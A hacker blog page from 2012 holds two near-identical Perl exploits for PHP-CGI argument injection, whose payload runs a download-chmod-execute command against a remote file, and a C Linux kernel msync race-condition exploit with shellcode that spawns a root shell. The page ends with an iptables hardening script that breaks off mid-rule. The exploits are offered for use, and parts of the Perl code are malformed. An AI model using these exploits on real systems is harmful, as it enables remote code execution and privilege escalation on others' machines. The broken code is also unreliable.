Help pay for xds lawyer fees.
LR

[Exploit Updated]: PHP CGI – executes a payload wich is php shellexec(); ,My 3rd PERL expl…

Posted on 6th May 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way :)

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

ALSO this CAN execute cmds ofc, i will addin a line if you wish to do this.. ok…

Ok now on with the show….

 


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG,rotor/aussies,even iCER ya prick :P 

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage: $0 <host>\n";
print "OPTIONAL CMD USE BUT DISABLED : [Ex: id]>\n";
exit(-1);
}

##my $cmd_exec_payload = "<php? system($_GET[\'$cmd\']); ?>";  ## Optional
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";  ## Config here

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

##$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $cmd_exec_payload ." HTTP/1.1\r\n";
##print $sock "Host: $host\n";
##print $sock "Accept: */*\n";
##print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command exec payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–

comments: 0 » tags: , , , , , , ,

[Exploit]: PHP CGI exec-cmd/injection of php-code thru phptags by (xd) PERL CODE

Posted on 6th May 2012 in Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way :)

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

Ok now on with the show….


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage:\n";
print "$0 <Host> <Cmd [Ex: id]>\n";
exit(-1);
}
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

 

Enjoy / xd–

comments: 0 » tags: , , , , , , , , ,

[Exploiting Linux code]: Modified version … yea, abit old BUT working on FC ;) hav fun… thx to sd for this, but, added Tifflib in this… so, have a play…

Posted on 25th April 2012 in Android, Codes, Exploits, Papers, Uncategorized

This code rox as is based on the bugs within fsync/fasync..msync..now, i have changed things to suit MY tests, but.. it is verymuch nice and, well, on RHEL4-5 is still OK … enjoy!

thx to sd , AB and others for the help on this mod..


/* Fedora4 exploit in msync() - still work in progress but it will exploit... */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/fcntl.h>
#include <sys/mman.h>
#include <sys/time.h>
#include <linux/elf.h>

#define __WCLONE 0x80000000 /* Wait only on non-SIGCHLD children */
#define ltime unsigned long long
#define MEMSZ (70*1024*1024)
#define MAGIC -123
unsigned char shellcode[] =

"\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34\x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50\x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00\x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11\x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3\x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8\x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04\x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3";

static ltime gtime() {
struct timeval tv;
gettimeofday(&tv, NULL);
return tv.tv_sec * 1000000 + tv.tv_usec;
}

ltime lt;

static void time_start() {
lt = gtime();
}

static void time_end() {
printf("took %lu microseconds\n", gtime() - lt);
}

void core_stat() {
int s;
char buf[512];
char incore;
unsigned long last = 0;
FILE *f;

sprintf(buf, "/proc/%d/maps", getpid());
f = fopen(buf, "rt");
while (fgets(buf, 512, f)) {
unsigned int from, to;
unsigned int i;
if (sscanf(buf, "%x-%x", &from, &to) < 2)
break;
for (i = from; i < to; i += PAGE_SIZE) {
mincore((void *) i, PAGE_SIZE, &incore);
if (incore) {
r:;
if (!last) {
printf("in core 0x%08x-", i);
s = last = i;
continue;
}
if (last + PAGE_SIZE == i) {
last = i;
continue;
}
printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s);
last = 0;
goto r;
}
if (!last)
continue;
printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s);
last = 0;
}
}
fclose(f);
}
#define SWAPFILE "TTswap"
#define EATFILES "TTeatfiles"
#define EATFILE "TTeatfile"
#define SHAREFILE "TTsharefile"
#define DUMMYFILE "TTdummyfile"
#define EATTIME 10
#define LIBFILE "TTlib"

/* number of vma struct fill */
#define VMAFILL 15000
/* how much pages to sync - 2 is enough */
#define NSYNC 2
#define BASE (char *) 0x60000000
#define DBASE (char *) 0x80001000
#define EPAGE (char *) 0x80000000
#define MAPSTEP 64 * 4096
#if 1
#define DEBUG(x...) { printf("%s():", __func__); printf(x); printf("\n"); }
#else
#define DEBUG(x...)
#endif
#define sendsig(pid) kill(pid, SIGUSR1)
#define wait4sig() { while (!gotsig) pause(); gotsig = 0; }
#define PAGE_DOWN(x) (x & ~(PAGE_SIZE-1))
#define PAGE_ALIGN(x) ((x+PAGE_SIZE-1) & ~(PAGE_SIZE-1))

#undef O_DIRECT
#define O_DIRECT 0

struct libimg {
Elf32_Ehdr elf;
Elf32_Phdr ph;
};
struct dentry_struct {
unsigned dummy0, dummy1;
void *inode1, *inode2;
};
struct file_struct {
struct file_struct *next, *prev;
void *dentry;
void *mnt;
void *op;
void *f_mapping[64];
};
struct vma_struct {
void *mm;
unsigned long vm_start;
unsigned long vm_end;
struct vma_struct *vm_next;
unsigned long pgprot;
unsigned long vmflags;
char rb[16];
void *shared_next, *shared_prev;
void *vm_ops;
unsigned long pgoff;
void *file;
void *priv;
};
struct mm_struct {
struct vma_struct *mmap;
void *rb;
struct vma_struct *cache;
void *pgd1;
void *pgd2;
void *pgd3;
unsigned long locks[32];
};
struct libimg limg = {
{
e_ident: "\177ELF",
e_type: ET_EXEC,
e_machine: EM_386,
e_phoff: sizeof(Elf32_Ehdr),
e_ehsize: sizeof(Elf32_Ehdr),
e_phentsize: sizeof(Elf32_Phdr),
e_phnum: 1
},
{
p_type: PT_LOAD,
p_vaddr: 0,
p_memsz: 0
}
};

static void make_lib(char *name) {
int libfd = open(name, O_CREAT|O_RDWR|O_TRUNC, 0700);
write(libfd, &limg, sizeof(limg));
fchmod(libfd, 0700);
}
static char thread_stack[16384];
int fd1, fd2, fd3;
char buf[MAPSTEP];
int notincore;
int t4;
int t3;
int t2;
int bigsize = 0;
char *bigmem = NULL;
int swapsize = 0;
char *swapmem = NULL;
char *base = BASE;
char *vmamem;
int gotsig = 0;
int sem = 0;
#define cleanup() _cleanup(__func__, __LINE__)
void killall() {
if (t2 != getpid())
kill(t2, SIGKILL);
if (t3 != getpid())
kill(t3, SIGKILL);
if (t4 != getpid())
kill(t4, SIGKILL);
}

void _cleanup(const char *name, int line) {
printf("cleanup called! from %s:%d\n", name, line);
killall();
unlink(SHAREFILE);
unlink(SWAPFILE);
unlink(EATFILES);
unlink(EATFILE);
unlink(LIBFILE);
_exit(1);
}
#define FAKES_BASE 0x50000000

struct fakes {
int t1;
struct mm_struct mm;
struct vma_struct vma;
struct file_struct file;
struct dentry_struct dentry;
unsigned long mapping24[128];
unsigned long mapping26[128];
unsigned long inode[128];
unsigned long pgd[1024];
void *ptrs[128];
char shellcode[sizeof(shellcode)];
int t2;
};
struct fakes *fakes = (void *) FAKES_BASE;
void build_fakevma() {
int i;
memset(fakes, 0, sizeof(*fakes));
fakes->vma.vm_end = (unsigned)( base + PAGE_SIZE * 2);
fakes->vma.vm_start = (unsigned)(base + PAGE_SIZE);
fakes->vma.vmflags = 0xf;
fakes->vma.file = &fakes->file;
fakes->vma.mm = &fakes->mm;
fakes->mm.pgd1 = fakes->pgd;
fakes->mm.pgd2 = fakes->pgd;
fakes->mm.pgd3 = fakes->pgd;
memset(fakes->pgd, 0, sizeof(fakes->pgd));
for (i = 0; i < 32; i++)
fakes->mm.locks[i] = 1;
fakes->file.dentry = &fakes->dentry;
fakes->dentry.inode1 = fakes->inode;
fakes->dentry.inode2 = fakes->inode;
for (i = 0; i < 32; i++)
fakes->inode[i] = 1;
for (i = 32; i < 128; i++)
fakes->inode[i] = (unsigned long) fakes->mapping24;
for (i = 0; i < 64; i++)
fakes->file.f_mapping[i] = fakes->mapping26;
fakes->mapping26[0] = (unsigned long) fakes->inode;
for (i = 1; i <= 3; i++)
fakes->mapping26[i] = 0;
for (i = 4; i < 16; i++)
fakes->mapping26[i] = (unsigned long) &fakes->mapping26[i];
for (i = 16; i <= 30; i++)
fakes->mapping26[i] = (unsigned long) fakes->ptrs;
for (i = 0; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) &fakes->mapping24[i];
for (i = 23; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) fakes->ptrs;
fakes->file.op = fakes->ptrs;
for (i = 0; i < 128; i++)
fakes->ptrs[i] = fakes->shellcode;
memcpy(fakes->shellcode, shellcode, sizeof(shellcode));
}

void create_fakepage(void *buf) {
int i;
void *vma = &fakes->vma;
void **p = buf;
for (i = 0; i < MAPSTEP; i += sizeof(void *))
*p++ = vma;
}
static void sighand(int d) {
gotsig = 1;
}

static int thread(void *d) {
int t3;
int ret;
int i;
wait4sig();
printf("(sleep1)\n");
usleep(300000);
printf("(sleep1 finished)\n");
printf("trying to mmap2 back the evil page\n");
for (i = 0; i < VMAFILL; i++) {
if (i == VMAFILL/2)
ret=mmap2(swapmem + PAGE_SIZE * 2, PAGE_SIZE,PROT_READ|PROT_WRITE,MAP_SHARED|MAP_FIXED, fd3, 0);
mmap(vmamem + i * PAGE_SIZE, PAGE_SIZE,PROT_READ|((i&1)?(PROT_WRITE):(PROT_EXEC)),MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
}
swapmem[PAGE_SIZE*2] = 'x';
printf("%p, mapped\n",ret);
printf("(sleep2)\n");
if (sem)
cleanup();
sendsig(t3);
usleep(300000);
printf("(sleep2 finished)\n");
if (sem)
cleanup();
munmap(vmamem, VMAFILL * PAGE_SIZE);
printf("doing msync\n");
ret = msync(swapmem + PAGE_SIZE * 2, PAGE_SIZE * 4, MS_SYNC);
printf("finished msync, %d, errno=%d\n", ret, errno);
if (ret == -1 && errno == 123) {
sem = 0;
killall();
printf("y4'r3 1uCky k1d!\n");

setuid(0);

setresgid(0);
execl("/bin/sh", "/bin/sh", "-i", NULL);  // bit better now :P
printf("execve failed %d\n", errno);
}
if (!sem) {
printf(":(\n");
cleanup();
}
_exit(0);
}
int main(int argc, char *argv[]) {
int i, n;
char *dummy = DBASE;
printf("linux kernel msync race condition\nbug discovered by sd, further research by sd and now xd\nthis is development-in-progress code\n=============================================\n");
signal(SIGUSR1, sighand);
signal(SIGALRM, sighand);
setbuf(stdout, NULL);
i = open(SHAREFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
mmap2(FAKES_BASE, PAGE_ALIGN(sizeof(*fakes)), PROT_READ|PROT_WRITE|PROT_EXEC,MAP_SHARED, i,0);
ftruncate(i, PAGE_ALIGN(sizeof(*fakes)));
build_fakevma();
t4 = fork();
if (!t4) {
while (1) {
fakes->t1++;
fakes->t2++;
sched_yield();
}
}
printf("creating page\n");
create_fakepage(buf);
i = open(DUMMYFILE,O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(i, MAPSTEP);
write(i, buf, MAPSTEP);
for (n = 0; n < MEMSZ; n += MAPSTEP)
mmap(dummy + n, MAPSTEP, PROT_READ|PROT_WRITE, MAP_SHARED, i, 0);
fd3 = open(EATFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(fd3, 16384);
fd1 = open(EATFILES, O_CREAT|O_RDWR|O_TRUNC, 0777);
alarm(EATTIME);
printf("done fakepage\n");
do {
int c;
c = write(fd1, buf, MAPSTEP);
if (c < MAPSTEP)
break;
bigsize += c;
printf("done %d Kb\r", bigsize / 1024);
} while (!gotsig);
printf("\n");
alarm(0);
gotsig = 0;
bigmem = mmap2(base - bigsize, bigsize, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_SHARED, fd1, 0);  // ye i changed this to mmap2() (xd) ...go figure
if (bigmem == MAP_FAILED)
cleanup();
t3 = fork();
if (!t3) {
wait4sig();
printf("starting aggresive write!\n");
write(fd3, bigmem, bigsize);
printf("done aggresive write!\n");
_exit(0);
}
t2 = clone(thread, thread_stack + sizeof(thread_stack) - 4, 0xf00, NULL);
swapmem = base;
if (mmap(swapmem, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANONYMOUS|MAP_PRIVATE, 0, 0) == MAP_FAILED) cleanup();
printf("creating swapfile\n");
fd2 = open(SWAPFILE, O_CREAT|O_RDWR|O_TRUNC, 0777);
ftruncate(fd2, MEMSZ);
vmamem = swapmem + MEMSZ + 16*PAGE_SIZE;
printf("vmamem = %p\n", vmamem);
mmap(swapmem + PAGE_SIZE, PAGE_SIZE, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_FIXED, fd2, 0);
printf("swapmem = %p, swapsize = %d\n", swapmem, 2*PAGE_SIZE);
write(fd2, dummy, MEMSZ);
close(fd2);
printf("unlink\n");
unlink(SWAPFILE);
build_fakevma();
sendsig(t2);
limg.ph.p_vaddr = (unsigned) swapmem + PAGE_SIZE;
limg.ph.p_memsz = PAGE_SIZE * 2;
make_lib(LIBFILE);
printf("started uselib\n");
time_start();
uselib(LIBFILE);
time_end();
printf("uselib finished!\n");
sem = 1;
printf("pid %d\n",getpid());
n = 0;
n = waitpid(t2, NULL, __WCLONE);
printf("waitpid got %d/%d\n", n, errno);
cleanup();
}

 

enjoy1

xd / freelance coder

comments: 0 » tags: , , , ,

IPTABLES/IP6TABLES KUSTOMISED SETTINGS TO REJECT DoS , BOTH PROTOCOLS! (LINUX)

Posted on 25th April 2012 in Codes, Exploits, Papers, Uncategorized

MY KUSTOM FIREWALL , ENJOY! SINCE MIGRATING TO BSD, I HAVE LET IPTABLES GO F**K ITSELF ABIT BUT HERE ANYHOW.. ENJOY SOME PROTECTION EH.. DONATE TO FUCKING HELP ME PAY MY LAWYER FOR CHRISTS SAKE, I WONT LAST MUCH DAMN LONGER WITHOUT IT! LOL, YES IM A BUM AND BROKE, IM SPONSRED BY MY GOVERNEMNTS SS :p SO FUCKING LIKE WHAT YOUR GETTIN, COZ I DONT REALLY HAVE TO GIVE SHIT, JUST REMMEBER THT.

HERE.


#!/bin/sh
# Loopback interface
LO_IF="lo"
# Network card connected to Internet
NET_IF="eth1"
# DMZ interface, if any
DMZ_IF=""

# iptables executables
IPTABLES="/sbin/iptables"
IP6TABLES="/sbin/ip6tables"

# Set this to 1 if you want enable IPv4 port forwarding
IPV4_FORWARDING=""
# 99% you don't need IPv6 at all, so, disable it
DISALLOW_IPV6="1"

# Ports that you want to be explicitly disabled
PORTS_TO_DISABLE="113"
# TCP traffic is completely disabled, you can cherry-pick ports
# you want to allow traffic in and out
TCP_PORTS_INCOMING_ALLOW="21 631 6667 7000 2222 80 443"
TCP_PORTS_OUTGOING_ALLOW="21 631 6667 7000 2222 80 443"
# UDP traffic is completely disabled, you can cherry-pick ports
# you want to allow traffic in and out
UDP_PORTS_INCOMING_ALLOW="53"
UDP_PORTS_OUTGOING_ALLOW="53"
# Block IPs trying to make too many connections on given ports
# If you have Entropy connecting, do not set this!
# Of course timed ports here have to be set in the variables above too.
# It will work for both tcp and udp.
TIMED_PORTS=""
# Number of times ip is allowed to bug port
TIMED_PORTS_HIT_COUNT="5"
# Number of seconds the ban will last and also the amount of time
# within user can at most try to connect TIMED_PORTS_HIT_COUNT times
TIMED_PORTS_TIMER_SECS="300"

# =========================
# PORT SETTINGS ABOVE =====
# =========================

# Allow sane ICMP packets (ping, traceroute) (DoS)
# set this to 1 if you want it, or leave unset
ALLOW_SANE_ICMP="1"
# Completely disable ICMP instead? (DoS)
# set this to 1 if you want it, or leave unset
FUCK_ICMP_I_DONT_NEED_IT=""
# Number of allowed ICMP packets per second (this is a further filter) (DoS)
ICMP_PACKETS_PER_SECOND="1"
# Also rate limit RST Packets, to mitigate SMURF attacks (DoS)
RST_PACKETS_PER_SECOND="2"

# Kill identd?
# set this to 1 if you want it, or leave unset
KILL_IDENTD="1"
# Kill port scanning? If you set this to 1, please also set
# a port to monitor against port scans (I suggest 139, trust me, it's fine for ssh too)
# IP will be blocked for PORT_SCANNING_SECONDS (1 day)
KILL_PORT_SCANNING="1"
PORT_SCANNING_PORT="139"
PORT_SCANNING_SECONDS="86400"
# Enable IP spoofing protection? (DoS)
IP_SPOOFING_PROTECTION="1"
# Enable kernel SYN flood protection? (DoS)
SYN_FLOOD_PROTECTION="1"
# Max SYN backlog on TCP
TCP_MAX_SYN_BACKLOG="1024"
# Set the tcp-time-wait buckets pool size
TCP_MAX_TW_BUCKETS="1440000"
# Ignore ICMP broadcasts anyway? (DoS)
IGNORE_ICMP_BROADCASTS="1"
# Log packets with impossible addresses?
LOG_MARTIAN_IPS="1"
# Disallow ICMP redirects? (DoS)
DISALLOW_ICMP_REDIRECTS="1"
# Disallow source routed packets? (DoS)
DISALLOW_SOURCE_ROUTED_PACKETS="1"
# Disallow multicast routing? (DoS)
#DISALLOW_MULTICAST_ROUTING="1"
# Disallow proxy_arp?
DISALLOW_PROXY_ARP="1"
# Disallow bootp relay?
DISALLOW_BOOTP_RELAY="1"
# Enable secure redirects (only accept ICMP redirects for
# gateways. Helps against MITM attacks.
ENABLE_SECURE_ICMP_REDIRECTS="1"

# Decrease the time default value for tcp_fin_timeout connection
TCP_FIN_TIMEOUT="15"
# Decrease the time default value for tcp_keepalive_time connection
TCP_KEEPALIVE_TIME="1800"
# Handle TCP window scaling, disable by default
DISALLOW_TCP_WINDOW_SCALING=""
# Turn off TCP timestamp feature
TCP_TIMESTAMP="0"

# Drop traffic from IANA-reserved IPs.
DROP_IANA_IPS="1"
# Completely ignore Microsuck ports
IGNORE_MICROSOFT_SHIT="1"

# General default logging rate limit parameters
RLIMIT="-m limit --limit 3/s --limit-burst 8"
# General default logging parameters
LOG="LOG --log-level debug --log-tcp-sequence --log-tcp-options"
LOG="${LOG} --log-ip-options"

# set this to a valid path containing your custom iptables rules
# it will be sourced
CUSTOM_RULES_FILE_PRE=""
CUSTOM_RULES_FILE_POST=""

####
#### stay away from here.
####

if [ -z "${NET_IF}" ]; then
echo "set NET_IF"
exit 1
fi
if [ ! -x ""${IPTABLES}"" ]; then
echo "set IPTABLES"
exit 1
fi
if [ ! -x ""${IP6TABLES}"" ]; then
echo "set IP6TABLES"
exit 1
fi

# drop everything by default
"${IPTABLES}" -P INPUT DROP
"${IPTABLES}" -P FORWARD DROP
"${IPTABLES}" -P OUTPUT DROP

# Set the nat/mangle/raw tables' chains to ACCEPT
"${IPTABLES}" -t nat -P PREROUTING ACCEPT
"${IPTABLES}" -t nat -P OUTPUT ACCEPT
"${IPTABLES}" -t nat -P POSTROUTING ACCEPT

"${IPTABLES}" -t mangle -P PREROUTING ACCEPT
"${IPTABLES}" -t mangle -P INPUT ACCEPT
"${IPTABLES}" -t mangle -P FORWARD ACCEPT
"${IPTABLES}" -t mangle -P OUTPUT ACCEPT
"${IPTABLES}" -t mangle -P POSTROUTING ACCEPT

# clear previous rules
"${IPTABLES}" -F
"${IPTABLES}" -t nat -F
"${IPTABLES}" -t mangle -F
"${IPTABLES}" -X
"${IPTABLES}" -t nat -X
"${IPTABLES}" -t mangle -X
"${IPTABLES}" -Z
"${IPTABLES}" -t nat -Z
"${IPTABLES}" -t mangle -Z

if [ -n "${DISALLOW_IPV6}" ]; then
"${IP6TABLES}" -P INPUT DROP
"${IP6TABLES}" -P FORWARD DROP
"${IP6TABLES}" -P OUTPUT DROP
# The mangle table can pass everything
"${IP6TABLES}" -t mangle -P PREROUTING ACCEPT
"${IP6TABLES}" -t mangle -P INPUT ACCEPT
"${IP6TABLES}" -t mangle -P FORWARD ACCEPT
"${IP6TABLES}" -t mangle -P OUTPUT ACCEPT
"${IP6TABLES}" -t mangle -P POSTROUTING ACCEPT
# Delete all rules.
"${IP6TABLES}" -F
"${IP6TABLES}" -t mangle -F
# Delete all chains.
"${IP6TABLES}" -X
"${IP6TABLES}" -t mangle -X
# Zero all packets and counters.
"${IP6TABLES}" -Z
"${IP6TABLES}" -t mangle -Z

fi

if [ -f "${CUSTOM_RULES_FILE_PRE}" ]; then
source "${CUSTOM_RULES_FILE_PRE}"
fi

# setup ipv4 forwarding
ip_forward="0"
if [ -n "${IPV4_FORWARDING}" ]; then
ip_forward="1"
fi
echo "Setting ip_forward to ${ip_forward}"
echo ${ip_forward} > /proc/sys/net/ipv4/ip_forward

# ip spoofing protection
ip_spoof="0"
if [ -n "${IP_SPOOFING_PROTECTION}" ]; then
ip_spoof="1"
fi
for i in /proc/sys/net/ipv4/conf/*/rp_filter; do
echo "Setting ip spoofing protection on ${i} to ${ip_spoof}"
echo ${ip_spoof} > ${i}
done

# syn flood attacks
syn_flood="0"
if [ -n "${SYN_FLOOD_PROTECTION}" ]; then
syn_flood="1"
fi
echo "Setting SYN flood protection on to ${syn_flood}"
echo ${syn_flood} > /proc/sys/net/ipv4/tcp_syncookies
echo "Setting tcp_max_syn_backlog to ${TCP_MAX_SYN_BACKLOG}"
echo "${TCP_MAX_SYN_BACKLOG}" > /proc/sys/net/ipv4/tcp_max_syn_backlog
echo "Setting tcp_max_tw_buckets to ${TCP_MAX_TW_BUCKETS}"
echo "${TCP_MAX_TW_BUCKETS}" > /proc/sys/net/ipv4/tcp_max_tw_buckets

log_from_mars="0"
if [ -n "${LOG_MARTIAN_IPS}" ]; then
log_from_mars="1"
fi
for i in /proc/sys/net/ipv4/conf/*/log_martians; do
echo "Setting martian sources logging on ${i} to ${log_from_mars}"
echo ${log_from_mars} > ${i}
done

# don't log invalid responses to broadcast
echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses

# don't accept or send ICMP redirects.
icmp_redir="1"
if [ -n "${DISALLOW_ICMP_REDIRECTS}" ]; then
icmp_redir="0"
fi
for i in /proc/sys/net/ipv4/conf/*/accept_redirects; do
echo "Setting ICMP redirection acceptance on ${i} to ${icmp_redir}"
echo ${icmp_redir} > ${i}
done
for i in /proc/sys/net/ipv4/conf/*/send_redirects; do
echo "Setting ICMP redirection send on ${i} to ${icmp_redir}"
echo ${icmp_redir} > ${i}
done

# don't accept source routed packets.
sr_pack="1"
if [ -n "${DISALLOW_SOURCE_ROUTED_PACKETS}" ]; then
sr_pack="0"
fi
for i in /proc/sys/net/ipv4/conf/*/accept_source_route; do
echo "Setting routed packed disallowing on ${i} to ${sr_pack}"
echo ${sr_pack} > ${i}
done

if [ -n "${TCP_FIN_TIMEOUT}" ]; then
echo "Setting tcp_fin_timeout to ${TCP_FIN_TIMEOUT}"
echo "${TCP_FIN_TIMEOUT}" > /proc/sys/net/ipv4/tcp_fin_timeout
fi
if [ -n "${TCP_KEEPALIVE_TIME}" ]; then
echo "Setting tcp_keepalive_time to ${TCP_KEEPALIVE_TIME}"
echo "${TCP_KEEPALIVE_TIME}" > /proc/sys/net/ipv4/tcp_keepalive_time
fi
w_scal="1"
if [ -n "${DISALLOW_TCP_WINDOW_SCALING}" ]; then
w_scal="0"
fi
echo "Setting tcp_window_scaling to ${w_scal}"
echo "${w_scal}" > /proc/sys/net/ipv4/tcp_window_scaling

# TCP timestamp
echo "Setting tcp_timestamps to ${TCP_TIMESTAMP}"
echo "${TCP_TIMESTAMP}" > /proc/sys/net/ipv4/tcp_timestamps

# disallow multicast routing
# TODO: doesn't work
#m_rout="1"
#if [ -n "${DISALLOW_MULTICAST_ROUTING}" ]; then
#    m_rout="0"
#fi
#for i in /proc/sys/net/ipv4/conf/*/mc_forwarding; do
#    echo "Setting multicast forwarding on ${i} to ${m_rout}"
#    echo ${m_rout} > ${i}
#done

# disallow proxy_arp
p_arp="1"
if [ -n "${DISALLOW_PROXY_ARP}" ]; then
p_arp="0"
fi
for i in /proc/sys/net/ipv4/conf/*/proxy_arp; do
echo "Setting proxy_arp on ${i} to ${p_arp}"
echo ${p_arp} > ${i}
done

bp_rel="1"
if [ -n "${DISALLOW_BOOTP_RELAY}" ]; then
bp_rel="0"
fi
for i in /proc/sys/net/ipv4/conf/*/bootp_relay; do
echo "Setting bootp_relay on ${i} to ${bp_rel}"
echo ${bp_rel} > ${i}
done

s_redir="0"
if [ -n "${ENABLE_SECURE_ICMP_REDIRECTS}" ]; then
s_redir="1"
fi
for i in /proc/sys/net/ipv4/conf/*/secure_redirects; do
echo "Setting secure_redirects on ${i} to ${s_redir}"
echo ${s_redir} > ${i}
done

# enable changes
echo 1 > /proc/sys/net/ipv4/route/flush

# create some custom chains, useful for logging
# LOG packets, then ACCEPT
RLIMIT="-m limit --limit 3/s --limit-burst 8"
"${IPTABLES}" -N ACCEPTLOG
"${IPTABLES}" -A ACCEPTLOG -j ${LOG} ${RLIMIT} --log-prefix "ACCEPT "
"${IPTABLES}" -A ACCEPTLOG -j ACCEPT
# LOG packets, then DROP.
"${IPTABLES}" -N DROPLOG
"${IPTABLES}" -A DROPLOG -j ${LOG} ${RLIMIT} --log-prefix "DROP "
"${IPTABLES}" -A DROPLOG -j DROP
# LOG packets, then REJECT.
# TCP packets are rejected with a TCP reset.
"${IPTABLES}" -N REJECTLOG
